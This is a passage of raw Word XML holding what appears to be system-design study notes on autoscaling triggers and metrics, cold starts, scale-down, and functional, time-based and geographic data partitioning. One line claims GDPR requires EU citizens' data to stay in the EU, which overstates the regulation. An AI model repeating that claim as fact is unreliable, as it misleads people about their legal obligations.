          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Act:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Add or remove instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4E18B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stabilize:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Wait a cooldown period before acting again (prevent thrashing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D7FF1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reactive scaling (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2105A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Trigger: CPU crosses 70% threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A1155" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Action: Launch 2 new instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557AC0A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Problem: There's a lag. By the time instances launch (60–120 seconds), boot, pass health checks, and start receiving traffic — the original instances may be overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FE462" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Predictive scaling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12995AE5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Analyze historical traffic patterns (e.g., "traffic spikes at 9am every Monday").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040CE1F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Pre-scale 15 minutes before the expected spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71304750" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Machine learning models predict future load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CAFE9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>AWS has "Predictive Scaling" that does exactly this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2165748F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling metrics — choosing the right signal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C354F8A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Good general-purpose metric but lagging indicator. By the time CPU is high, latency is already bad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343946D0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request count per instance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> More predictive. If each instance handles 1,000 RPS optimally, scale when approaching that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E5FB3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue depth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> For worker services. If the queue grows, add workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A0A1B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response latency (p99):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Direct user-impact metric. Scale when latency degrades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B26A80" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom business metrics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> "Active WebSocket connections per node" for a chat system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AC8F4A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Scaling Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01B4BE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cold start problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FB2F7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>New instance launches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0194AE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application starts, loads configuration, establishes DB connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B1C714" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>In-memory caches are empty — every request hits the database (cache stampede).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F2B72" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Performance is terrible until caches warm up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA2A4CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D995E5C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-warmed pools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Keep idle instances ready (Warm pools in AWS ASG).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5BBFF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache priming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> On startup, load popular data from a cache snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA17E8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gradual traffic shift:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Load balancer sends a small fraction of traffic initially, increasing over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703D2E8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling down is harder than scaling up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEEDE4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Which instance do you terminate? One with active requests?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB914F9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Connection draining: allow in-flight requests to complete (30–60 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6689CB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Stateful workloads: if the instance has local cache or data, terminating it loses that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC11BD2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scale-down too aggressively → traffic increases slightly → scale up again → flapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D55106B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="1A6A80C9">
          <v:rect id="_x0000_i2294" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5363BD80" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Data Partitioning Strategies Beyond Database Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469AF2B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Functional Partitioning (Service Decomposition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571CC07" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concept:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Split by function/domain rather than by data key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD065B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User data → User Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9946B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Order data → Order Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FB207" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Product catalog → Product Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD7242" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each database scales independently based on its specific workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F154544" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0EFBC5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The user database might be read-heavy (profile lookups) → scale with read replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDAC00" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The order database might be write-heavy (constant new orders) → scale with sharding by user_id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C6A5E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>The product catalog might be search-heavy → replicate into Elasticsearch for full-text search scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B29876B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Time-Based Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433CE3AB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used for:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Logs, events, metrics, time-series data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7021F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C19216C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data is partitioned by time range: one partition per day/week/month.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2414FB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Recent data (hot) on fast storage with more replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245DED7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Old data (cold) on cheaper storage with fewer replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82A91C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's effective for scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E6A31" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Queries almost always have a time range. Only relevant partitions are scanned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CBD88" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Old partitions can be archived/compressed without affecting current write throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFDB2F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Easy to add capacity: new time period → new partition on new hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E84634" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example (Elasticsearch for logs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA3891" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>One index per day: logs-2026-05-28, logs-2026-05-27, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9004C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Today's index: 3 primary shards, 1 replica, on SSD-backed nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D337B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Last month's indices: merged into fewer shards, moved to HDD nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCE7A6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Last year's indices: frozen (loaded from snapshot on demand).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FAFB5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Geographic Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD49BE2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concept:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Data lives in the region closest to its user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6CDA81" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>European users' data → EU data center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0789E9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>US users' data → US data center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542A3EF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Asian users' data → Asia data center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897DE10" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F0EA2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Low latency (data is local to the user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295162C0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data sovereignty compliance (GDPR requires EU citizen data stays in EU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32462A01" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each region scales independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6426D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Challenges:</w:t>
      </w:r>
    </w:p>
